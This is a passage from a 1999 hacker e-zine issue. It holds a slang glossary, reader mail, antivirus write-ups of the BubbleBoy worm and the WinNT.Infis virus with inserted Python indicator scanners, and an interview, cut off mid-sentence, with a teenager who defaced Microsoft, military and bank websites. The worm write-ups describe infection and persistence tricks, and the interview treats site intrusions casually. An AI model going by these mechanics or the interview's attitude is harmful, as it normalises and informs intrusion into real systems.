      The subject line will always contain the title of the article, so that
      you may quickly and efficiently filter past the articles of no interest.
      
      
      This list will contain:
      
      
      o       Articles catering to security, hacking, firewalls, new security
              encryption, products, public hacks, hoaxes, legislation affecting
              these topics and more.
      
      
      o       Information on where to obtain articles in current magazines.
      
      
      o       Security Book reviews and information.
      
      
      o       Security conference/seminar information.
      
      
      o       New security product information.
      
      
      o       And anything else that comes to mind..
      
      
      Feedback is encouraged. The list maintainers would like to hear what
      you think of the list, what could use improving, and which parts
      are "right on". Subscribers are also encouraged to submit articles
      or URLs. If you submit an article, please send either the URL or
      the article in ASCII text. Further, subscribers are encouraged to give
      feedback on articles or stories, which may be posted to the list.
      
      
      Please do NOT:
      
      
              * subscribe vanity mail forwards to this list
      
      
              * subscribe from 'free' mail addresses (ie: juno, hotmail)
      
      
              * enable vacation messages while subscribed to mail lists
      
      
              * subscribe from any account with a small quota
      
      
      All of these generate messages to the list owner and make tracking
      down dead accounts very difficult. I am currently receiving as many 
      as fifty returned mails a day. Any of the above are grounds for
      being unsubscribed. You are welcome to resubscribe when you address
      the issue(s).
      
      
      Special thanks to the following for continued contribution:
              William Knowles, Aleph One, Will Spencer, Jay Dyson,
              Nicholas Brawn, Felix von Leitner, Phreak Moi and 
              other contributors.
      
      
      ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
      ISN Archive: http://www.landfield.com/isn
      ISN Archive: http://www.jammed.com/Lists/ISN/
      
      
      ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
          private list. Moderation of topics, member subscription, and
          everything else about the list is solely at his discretion.
      
      
      The ISN membership list is NOT available for sale or disclosure.  
      
      
      ISN is a non-profit list. Sponsors are only donating to cover bandwidth 
          and server costs. 

    



    @HWA


 00.3 THIS IS WHO WE ARE
      ~~~~~~~~~~~~~~~~~~
 
      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      cruciphux@dok.org.........: currently active/editorial
      darkshadez@ThePentagon.com: currently active/man in black
      fprophet@dok.org..........: currently active/programming/IRC+ man in black
      sas2@usa.net .............: currently active/IRC+ distribution
      vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black
      twisted-pair@home.com......: currently active/programming/IRC+


      Foreign Correspondents/affiliate members
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       Qubik ............................: United Kingdom 
       D----Y ...........................: USA/world media
       HWA members ......................: World Media
       
      
      
      Past Foreign Correspondents (currently inactive or presumed dead) 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Sla5h.............................: Croatia
       N0Portz ..........................: Australia           
       system error .....................: Indonesia           
       Wile (wile coyote) ...............: Japan/the East      
       Ruffneck  ........................: Netherlands/Holland 
       Wyze1.............................: South Africa

       
       Please send in your sites for inclusion here if you haven't already
       also if you want your emails listed send me a note ... - Ed

      Spikeman's site is down as of this writing, if it comes back online it will be
      posted here.
      
      http://www.hackerlink.or.id/  ............ System Error's site (in Indonesian) 
      
      Sla5h's email: smuddo@yahoo.com
       

       *******************************************************************
       ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
       *******************************************************************

    :-p


    1. We do NOT work for the government in any shape or form. Unless you count paying
       taxes ... in which case we work for the gov't in a BIG WAY. :-/

    2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
       events it's a good idea to check out issue #1 at least and possibly also the
       Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


    @HWA



 00.4 Whats in a name? why HWA.hax0r.news??
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             
      
      Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pigeonholed with those 'dumb
     leet (l33t?) dewds' <see article in issue #4> this is the state
     of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
     up and comers, i'd highly recommend you get that book. It's almost
     like buying a clue. Anyway..on with the show .. - Editorial staff


     @HWA

00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the stuff related to personal usage and use in this zine are
    listed below: Some are very useful, others attempt to deny any possible
    attempts at eschewing obfuscation by obscuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavey equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same <coff>
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking <software>
                      C - Cracking <systems hacking>
                      V - Virus
                      W - Warfare <cyberwarfare usually as in Jihad>
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.

   *w00t  - 1 - Reserved for the uber ereet, no one can say this without severe repercussions
            from the underground masses. also "w00ten" <sic>

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck, where the fuck, when the fuck etc ..

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
            
     @HWA            
     
     
                            -=-    :.    .:        -=-
                            
                            
                            

 01.0 Greets!?!?! yeah greets! w0w huh. - Ed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, what's good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in
     your thoughts anyway.


       * all the people who sent in cool emails and support
       
     FProphet       Pyra                TwstdPair      _NeM_
     D----Y         Dicentra            vexxation      sAs72
     Spikeman       p0lix               Vortexia      Wyze1
     Pneuma         Raven               Zym0t1c       duro
     Repluzer       astral              BHZ           ScrewUp
     Qubik          gov-boi             _Jeezus_      Haze_
     YTcracker      
     
     Folks from #hwa.hax0r.news and #fawkerz, #ninjachat and #sesame 
     
     
               
     Ken Williams/tattooman ex-of PacketStorm,
          
     & Kevin Mitnick                      
     
     kewl sites:
     
     + http://www.hack.co.za  NEW
     + http://blacksun.box.sk. NEW
     + http://packetstorm.securify.com/ NEW
     + http://www.securityportal.com/ NEW
     + http://www.securityfocus.com/ NEW
     + http://www.hackcanada.com/
     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://www.freekevin.com/
     + http://www.genocide2600.com/
     + http://www.hackernews.com/ (Went online same time we started issue 1!)
     + http://www.net-security.org/
     + http://www.slashdot.org/
     + http://www.freshmeat.net/
     + http://www.403-security.org/
     + http://ech0.cjb.net/

     @HWA


 01.1 Last minute stuff, rumours and newsbytes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       "What is popular isn't always right, and what is right isn't
         always popular..."
                           - FProphet '99
                           
       

    +++ When was the last time you backed up your important data?
    
     
 
          
     
      Thanks to myself for providing the info from my wired news feed and others from whatever
      sources, also to Spikeman for sending in past entries.... - Ed
      
     @HWA

 01.2 MAILBAG - email and posts from the message board worthy of a read
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
              
      Yeah we have a message board, feel free to use it, remember there are no stupid questions...
      well there are but if you ask something really dumb we'll just laugh at ya, let's give the
      message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
      domain comes back online (soon) meanwhile the beseen board is still up...
        
      
    
      ==============================================================================
      
      Our newsletter gets mirrored and indexed by new underground search engine Nethersearch.com
     

      From: signalGod 
      To: hwa@press.usmc.net 
      Sent: Thursday, November 18, 1999 10:00 AM
      Subject: NetherSearch.Com

      HWA,
      
       I am one of the webmasters of NetherSearch.Com. We subscribed to your newsletter and have
       decided to download all of your newsletters to our server to act as a mirror for your files.
       Please feel free to visit our site and check it out, and please let us know what you think.
       Your newsletters have been added to our database, and are searchable with our database search
       engine. We would also like to invite you to submit your website to our internet search database.
       This will help us both by driving some traffic to your site and adding depth to our database.
       
       Thanks,
       ______________________________________________________
       SignalGod

       NetherSearch.Com - http://www.nethersearch.com -
       - Underground and Hacking Database Search Engine -
       Submit a URL to NetherSearch.Com 
       - http://www.nethersearch.com/search/addurl.htm -

      -=-
      
      
               

      From: Drew aka. Wyzewun <wizdumb@webmail.co.za>
      To: <cruciphux@dok.org>
      Sent: Friday, November 19, 1999 1:36 PM
      Subject: el8 phan mail!@#$%
     
     
      *Ahem* Dear HWA.hax0r.news,
      
      Since I have never seen anything in your mailbag, I figured I would
      write to you and give you something to put there. First off, let me
      dispel the rumour that Cruciphux has sex with sheep. Second of all,
      let me dispel the rumour that there never *was* a rumour that
      Cruciphux has sex with sheep. And in conclusion, I would like to say
      that I personally enjoy having sex with sheep.
      
      Your zine is the best in the whole wide world, except for that
      Forbidden Knowledge zine, which is even more kickass. Now who does
      that again... fux0r, I can't remember. But this is under no
      circumstances because I am drunk. Or because Pneuma has mad cheap wine
      here. It is just because I simply DON'T KNOW, okay?!@#$
      
      Please respond to me as soon as possible and give me a URL for good
      1nph0z3 on insecurities in Vortexia's anal cavity - they told me to
      look for RFC31337, but I can't find it anywhere! Please help...
      
      That Neato Elito Skanky Ass Hoe,
      Wyzewun [w1@antioffline.com]
      _______________________________________________________________
       http://www.webmail.co.za the South-African free email service
       
       
      -=-
           

      From: Kernel Panic <kernelpanic@flashmail.com>
      To: HWA.hax0r.news <HWA.hax0r.news-owner@listbot.com>
      Sent: Tuesday, November 16, 1999 5:08 AM
      Subject: RE: Issue #41 for Nov 7th out today


      ==================================================================
      The following message was received at HWA.hax0r.news-owner@listbot.com
      and is being forwarded to you, the list owner.
      ==================================================================
 
      I just want to say "Thank U for the great job of resuming the events and
      news of security business"
      Keep up with the excellent job
      Kernel Panic
 
      SouthAmerica-Peru
 
 
     ______________________________________________________________________
     To unsubscribe, write to HWA.hax0r.news-unsubscribe@listbot.com
     Start Your Own FREE Email List at http://www.listbot.com/
     
     
  
     From: <Nautilus5@xxx.aol.com>
     To: <cruciphux@dok.org>
     Sent: Friday, November 19, 1999 9:06 PM
     Subject: xxhax0rxx claims responsibility for hacking & destroying website


     Do you know this xxhax0rxx person?  He has claimed responsibility for hacking 
     & destroying a school webpage....he also posted in its place a full page of 
     written garbage about our school.  Please tell me that he is not affiliated 
     with your group.  I can send all correspondence from him to you if you would 
     like.  But he claims that he is Hax0r and goes by the screen name of xxhax0rxx.
     
     -=-
     
     Seems that because we have 'hax0r' in our name that we're a target for all kinds
     of lamers that use an alias or connotation of 'hax0r', notice the 'screenname'
     good old aol... - Ed
     
     
     
     See? we really do get mail Wyze1 ;-) I just don't print it all, ok sometimes
     I forget, sometimes its lame ... but kudos are always welcomed... - Ed 
      
      
      
      

      

 02.0 From the editor.
      ~~~~~~~~~~~~~~~~

     #include <stdio.h>
     #include <thoughts.h>
     #include <backup.h>

     main()
     {
      printf ("Read commented source!\n\n");

     /*
      * We're a week behind schedule with this release again,
      * seems like i'm not doing well in cold season. Being ill 
      * sucks and doesn't lend itself towards working on the
      * newsletter. Anyway here it is, have fun.. check out all
      * the new website defacements by sSh (Sesame Street Hackers)
      * they've been busy ppl...
      * 
      * 
      */
      printf ("EoF.\n");
      }

      

      Congrats, thanks, articles, news submissions and kudos to us at the
     main address: hwa@press.usmc.net complaints and all nastygrams and
     mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
     127.0.0.1, private mail to cruciphux@dok.org

     danke.

     C*:.
     
     -= start =--= start =--= start =--= start =--= start =--= start =--= start =-
     
                        ____            _             _
                       / ___|___  _ __ | |_ ___ _ __ | |_
                      | |   / _ \| '_ \| __/ _ \ '_ \| __|
                      | |__| (_) | | | | ||  __/ | | | |_
                       \____\___/|_| |_|\__\___|_| |_|\__|

     
                                 _             _
                             ___| |_ __ _ _ __| |_
                            / __| __/ _` | '__| __|
                            \__ \ || (_| | |  | |_
                            |___/\__\__,_|_|   \__|
                            
                            
      -= start =--= start =--= start =--= start =--= start =--= start =--= start =-                      
     
     
     
     
03.0 Bubbleboy email worm description 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.avp.ch
     
     
     
     
     I-Worm.BubbleBoy



     Type:     Email Worm
     Platform: MS Windows with Internet Explorer 5.0,
            MS Outlook 98/2000 or MS Outlook Express

    This is a worm virus that spreads via the Internet as infected email messages. The worm arrives
    as a message with no attachments - it uses several tricks to activate its code directly from
    the message body. When this message is opened, the worm code takes control, gets access
    to system resources (disk files and system registry), processes the Outlook address book and
    sends infected messages to these addresses (in a similar way to the
    "Macro.Word97.Melissa" virus).
   
    This is the first known modern Internet worm that spreads its copies with no attached data. In
    the case of other Internet worms a user has to open the attachment to activate the worm
    routines. In the case of this worm its spreading routines take control at the moment the
    message itself is opened.
   
    The Tricks
   
    To spread its copies this worm uses two tricks. The first one is the feature of MS Outlook that
    allows creating messages in the HTML format. HTML messages may contain scripts that will
    be automatically executed at the moment the HTML message is being displayed (user opens
    the message). The worm uses this feature to run its code when the infected message is
    opened. 
   
    To spread its copies further and to bypass Internet Explorer security the worm uses another
    trick, the so-called "Scriptlet.Typelib" security vulnerability. 
   
    This security breach allows HTML scripts to create disk files. The worm uses this breach to
    create an HTA file (HTML Application, a new file type that appeared with IE5) which contains
    the main worm code. This file is created in the Windows Startup folder, and as a result it is
    activated on the next Windows startup. Being run as a local disk file, the worm script in this
    file gets access to disk files and resources with no Internet Explorer security warning
    messages, connects to the Outlook address book and spreads itself.
   
    Technical details
   
    When a user opens an infected message, the worm script embedded in the message body is
    automatically activated and executed by MS Outlook. This script (by using the security breach)
    creates the "UPDATE.HTA" file in the "C:\WINDOWS\START MENU\PROGRAMS\STARTUP"
    directory. The worm also tries to create the same file in the "C:\WINDOWS\MENU
    INICIO\PROGRAMAS\INICIO\" directory (the default name in Spanish Windows).
   
    This "UPDATE.HTA" file contains the main worm code. It will be executed on the next Windows
    startup because of its location in the Startup folder. The worm has a minor bug here: it
    assumes that Windows is always installed in the C:\WINDOWS directory; otherwise the
    worm cannot create its file and fails to replicate further.
   
    When the UPDATE.HTA file is executed, the worm runs the Outlook application in a hidden window
    and creates a new message to all recipients from the Outlook address book in the same way as
    the "Melissa" virus does. This new message has the HTML format and contains the worm's script
    in the body. The message subject is "BubbleBoy back!", and the text body looks as follows:
   
     The BubbleBoy incident, pictures and sounds
     http://www.towns.com/dorms/tom/bblboy.htm
   
    (Note: the above shown web-address doesn't work) 
   
    After this message has been sent, the worm creates the following system registry key to
    prevent sending duplicate messages:
   
     "HKEY_LOCAL_MACHINE\Software\OUTLOOK.BubbleBoy\" = "OUTLOOK.BubbleBoy 1.0 by Zulu"
   
    At the end the worm displays a window containing the text:
   
      System error, delete "UPDATE.HTA" from the startup folder to solve this
      problem.
   
    The worm also changes the Windows registration data (this routine is executed at the moment
    the UPDATE.HTA script takes control): 
   
      RegisteredOwner = "BubbleBoy"
      RegisteredOrganization = "Vandelay Industries"
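
    A host check built from the indicators listed above, as an added example (not part of
    the AVP description): it looks for UPDATE.HTA in the two Startup paths on a mounted
    volume and for the worm's registry strings in a text registry export. The function
    names, the mounted-volume layout and the sample export are assumptions constructed
    for illustration.

```python
import os
import re
import tempfile

# Startup folders named in the description, relative to the root of drive C:.
STARTUP_DIRS = [
    ("WINDOWS", "START MENU", "PROGRAMS", "STARTUP"),
    ("WINDOWS", "MENU INICIO", "PROGRAMAS", "INICIO"),
]
DROPPED_FILE = "UPDATE.HTA"
MARKER_KEY = r"HKEY_LOCAL_MACHINE\Software\OUTLOOK.BubbleBoy"
CHANGED_VALUES = {
    "registeredowner": "BubbleBoy",
    "registeredorganization": "Vandelay Industries",
}

# Constructed registry export for the demo; the CurrentVersion key path is an assumption.
SAMPLE_EXPORT = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\Software\OUTLOOK.BubbleBoy]
@="OUTLOOK.BubbleBoy 1.0 by Zulu"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion]
"RegisteredOwner"="BubbleBoy"
"RegisteredOrganization"="Vandelay Industries"
"ProductName"="Microsoft Windows 98"
"""


def _child_ci(parent, name):
    """Find `name` inside `parent` ignoring case (a Linux mount is case-sensitive)."""
    try:
        for entry in os.listdir(parent):
            if entry.lower() == name.lower():
                return os.path.join(parent, entry)
    except OSError:
        pass
    return None


def find_dropped_hta(volume_root):
    """Return (kind, path) for every .hta file sitting in the listed Startup folders."""
    hits = []
    for parts in STARTUP_DIRS:
        path = volume_root
        for part in parts:
            path = _child_ci(path, part)
            if path is None:
                break
        if path is None or not os.path.isdir(path):
            continue
        for entry in sorted(os.listdir(path)):
            if entry.lower().endswith(".hta"):
                kind = "bubbleboy-name" if entry.upper() == DROPPED_FILE else "other-hta"
                hits.append((kind, os.path.join(path, entry)))
    return hits


def scan_reg_export(text):
    """Return (kind, key) findings from a REGEDIT4-style text export."""
    findings = []
    current_key = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current_key = line[1:-1].rstrip("\\")
            if current_key.lower() == MARKER_KEY.lower():
                findings.append(("marker-key", current_key))
            continue
        match = re.match(r'^"([^"]+)"="(.*)"$', line)
        if match:
            name, value = match.group(1).lower(), match.group(2)
            expected = CHANGED_VALUES.get(name)
            if expected is not None and value.lower() == expected.lower():
                findings.append(("changed-" + name, current_key))
    return findings


def build_sample_volume(root):
    """Create a constructed 'infected' folder layout under `root` (placeholder file only)."""
    startup = os.path.join(root, "Windows", "Start Menu", "Programs", "StartUp")
    os.makedirs(startup)
    with open(os.path.join(startup, "Update.hta"), "w") as handle:
        handle.write("<!-- constructed placeholder, no worm code -->")
    return startup


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_volume(tmp)
        for kind, path in find_dropped_hta(tmp):
            print(kind, path)
    for kind, key in scan_reg_export(SAMPLE_EXPORT):
        print(kind, key)
```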
   
    Protection
   
    Microsoft has released an update that eliminates this security vulnerability. We strongly
    recommend you visit http://support.microsoft.com/support/kb/articles/Q240/3/08.ASP and
    install this update. 
   
    If you do not use any HTML applications (HTA-files) at your work, there is another way to
    prevent infection by viruses of this type (the worms and viruses that use the "Scriptlet.Typelib"
    security vulnerability): remove the file association for the .HTA extension. To do this,
    follow these steps:
   
    1. Double-click the My Computer icon on the desktop. 
    2. In the window that appears, choose "View" -> "Options..." from the menu. 
    3. On the "File Types" tab, select the "HTML Application" item in the "Registered file types" listbox. 
    4. Click the "Remove" button and confirm the action. 
    5. Close the options dialog box. 


     @HWA
     
04.0 WinNT.Infis.4608 new Win NT virus
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.avp.ch/
     
     WinNT.Infis.4608

   
    "Infis" is a memory resident virus operating under Windows NT 4.0 with Service Packs 2, 3, 4,
    5, 6 installed. It does not affect systems running Windows 95/98, Windows 2000 or other
    versions of Windows NT. 
   
    Indication of an infection
   
    The virus does not manifest itself in any way and does not do any harm to the system. However,
    the virus has a bug in its infection routine and corrupts some files while infecting them; when
    run, the corrupted files cause the standard "is not a valid Windows NT application" error
    message. 
   
    Another indicator of virus presence is the INF.SYS file in the /WinNT/System32/Drivers folder. 
   
    Installation
   
    The virus installation routine copies the virus to the system, registers itself in there and returns
    control to the host program. As a result on first start the virus just installs its "dropper" to the
    system and does not infect the WinNT memory and other files. The memory and file infection
    routines will be activated later, when the "dropper" is run. 
   
    To install its "dropper" the virus extracts its "pure" code (4608 bytes) as a standalone PE EXE
    file named INF.SYS and writes it to the \SystemRoot\system32\drivers directory. Next the
    virus adds "run-it" commands to the system registry: it creates a new Registry key with
    three values:
   
     \Registry\Machine\System\CurrentControlSet\Services\inf
       Type         = 1   - standard Windows NT driver
       Start        = 2   - driver start mode
       ErrorControl = 1   - continue system loading on error in driver
   
    As a result the virus dropper is loaded as system WinNT driver on next system restart. 
   
    When the INF.SYS virus dropper takes control, the virus allocates a block of WinNT memory,
    reads its complete copy from the INF.SYS file for later use in the infection routine and hooks
    a poorly documented handler of WinNT internal system functions. The virus hook intercepts the
    file opening function only: it checks the file name and extension, then opens the file, checks
    the file format (PE) and runs the infection routine. 
   
    Infection
   
    The "Infis" virus infects only PE (Portable Executable) EXE files, except CMD.EXE (the Windows
    NT command processor). To tell infected files from uninfected ones, the virus sets the time and
    date stamp double word in the PE header to -1 (FFFFFFFFh). While infecting a file the virus
    increases the size of the last file section, writes itself there and modifies the necessary
    fields in the file header. As a result, when infected PE files are executed, the virus code
    receives control and runs the installation routine. 
   
    Payload
   
    The "Infis" virus does not carry any destructive payload. However, it contains errors that corrupt
    some files when infecting them. When the corrupted file is run it invokes a standard Windows
    NT application error message. 
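
    A scanner for the two file-level indicators given above (the FFFFFFFFh time/date stamp
    in the PE header and an INF.SYS file in a "drivers" folder), as an added example that is
    not part of the AVP description. The function names and the minimal PE images built by
    make_pe() are assumptions constructed for illustration.

```python
import os
import struct

INFIS_MARK = 0xFFFFFFFF   # TimeDateStamp value the description gives for infected files
DROPPER_NAME = "inf.sys"  # dropper file name from the description
DROPPER_SIZE = 4608       # size of the virus's "pure" code per the description


class NotPE(ValueError):
    """Raised when the data does not start with a usable MZ/PE header."""


def read_pe_summary(data):
    """Parse the COFF header and section table: returns timestamp and sections."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise NotPE("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise NotPE("missing PE signature")
    _machine, nsect, stamp, _symptr, _nsyms, opt_size, _chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    sections = []
    table = e_lfanew + 24 + opt_size
    for index in range(nsect):
        offset = table + 40 * index
        if offset + 40 > len(data):
            break  # header read was truncated; keep what was parsed
        name, vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, offset)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "virtual_size": vsize, "raw_size": raw_size, "raw_ptr": raw_ptr})
    return {"timestamp": stamp, "sections": sections}


def scan_tree(root):
    """Walk `root` and return (kind, path, detail) for each indicator found."""
    findings = []
    for dirpath, dirs, files in os.walk(root):
        dirs.sort()
        for fname in sorted(files):
            path = os.path.join(dirpath, fname)
            lower = fname.lower()
            if lower == DROPPER_NAME and os.path.basename(dirpath).lower() == "drivers":
                size = os.path.getsize(path)
                note = " (matches dropper size)" if size == DROPPER_SIZE else ""
                findings.append(("dropper-name", path, "%d bytes%s" % (size, note)))
            if not lower.endswith(".exe"):
                continue
            try:
                with open(path, "rb") as handle:
                    summary = read_pe_summary(handle.read(4096))
            except (NotPE, OSError):
                continue  # not a PE image or unreadable: nothing to report
            if summary["timestamp"] == INFIS_MARK:
                last = summary["sections"][-1]["name"] if summary["sections"] else "?"
                findings.append(("timestamp-marker", path, "last section " + last))
    return findings


def make_pe(stamp):
    """Build a constructed, minimal PE header image (headers only, not a program)."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x014C, 1, stamp, 0, 0, 0xE0, 0x0102)
    optional = b"\0" * 0xE0
    section = struct.pack("<8sIIII", b".text", 0x1000, 0x1000, 0x200, 0x400) + b"\0" * 16
    return dos + b"PE\0\0" + coff + optional + section


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        drivers = os.path.join(tmp, "WINNT", "system32", "drivers")
        os.makedirs(drivers)
        samples = {
            os.path.join(drivers, "INF.SYS"): make_pe(0x3841A6B0).ljust(DROPPER_SIZE, b"\0"),
            os.path.join(tmp, "WINNT", "system32", "CALC.EXE"): make_pe(INFIS_MARK),
            os.path.join(tmp, "WINNT", "system32", "CMD.EXE"): make_pe(0x3841A6B0),
        }
        for path, blob in samples.items():
            with open(path, "wb") as handle:
                handle.write(blob)
        for finding in scan_tree(tmp):
            print(finding)
```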
   
   
05.0  OSALL Interview with Flipz 1st person to deface a Microsoft site.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       Interview With Flipz
       10/27/99

                                                      Mike Hudack
                                                    Editor-in-Chief

       Flipz is a young man who both goes to school and moonlights as a systems
       analyst somewhere.  He's got a bright future for someone only fifteen years
       old [Editor's NOTE: As the writer of this article, I must admit that I
       am but sixteen years old.]... And, at that young age, he has been covered
       in MSNBC, Ziff Davis, Slashdot and so many more.  At that young age
       he's made history as the first person to deface a Microsoft Web page --
       ever.

       "I do it for fun, just like everyone does it for fun," Flipz said in an effort to
       explain why he defaces sites, "we don't do it because we have to, we don't
       do it because we want to, we don't do it because it's fun."  He says that his
       first defacement was when he was around ten or eleven -- that time a
       Solaris machine.  

       He knows that he hacks but doesn't know that he's defaced servers?

       Andersen Air Force Base

       "Hold on five seconds, I'll tell you," he told me when I asked if anything else
       was happening soon.  After a couple affirmatives and a few obscenities he
       informed me that he'd just gotten his latest defacement.  "Andersen.af.mil,"
       he calmly told me.

       It was just the latest in a string of sites he had previously held root on. 
       Apparently something has happened in Flipz' life to make him want to just
       throw it all out.  "It's been tough," he said.  "I just wanted to have some
       fun," let out some pent-up aggression.

       Microsoft

       Now it seems that he targets Microsoft NT boxes exclusively, explaining
       that he hates Windows NT -- and that Windows 2000 pisses him off even
       more.

       The thing that Flipz is most famous for right now is defacing the first
       Microsoft site ever.  He was on the phone with someone when he defaced
       it...  When he heard it was the first he was excited, but not surprised.  "I kind
       of knew it, but I didn't know it," he says about the defacement.  

       High Profile

       Like the Microsoft defacement, all of Flipz' attacks have been attention
       garnering, although none so much as that.  He's attacked numerous military
       sites, including from the Navy and Army.  In addition he's defaced two
       Department of Energy Web sites and the Duracell Battery Company,
       among others.

       Law Enforcement

       It was a couple months ago when Flipz defaced People's Bank, a relatively
       small Connecticut bank.  Somewhat afterwards Attrition.org was
       subpoenaed for any records they may have pertaining to Flipz and the
       defacement.  When I told him about the subpoena Flipz was rather shocked
       that the FBI hadn't raided him yet.  "It's been a while... you'd think they
       would have at least stopped me after White Sands [Missile Base.]"

       The FBI didn't though.  At one point during our conversation Flipz thought
       he was being raided as a black van rounded the corner to his house.  It
       turned out to be nothing, however.  "I'm just sitting on edge, waiting for
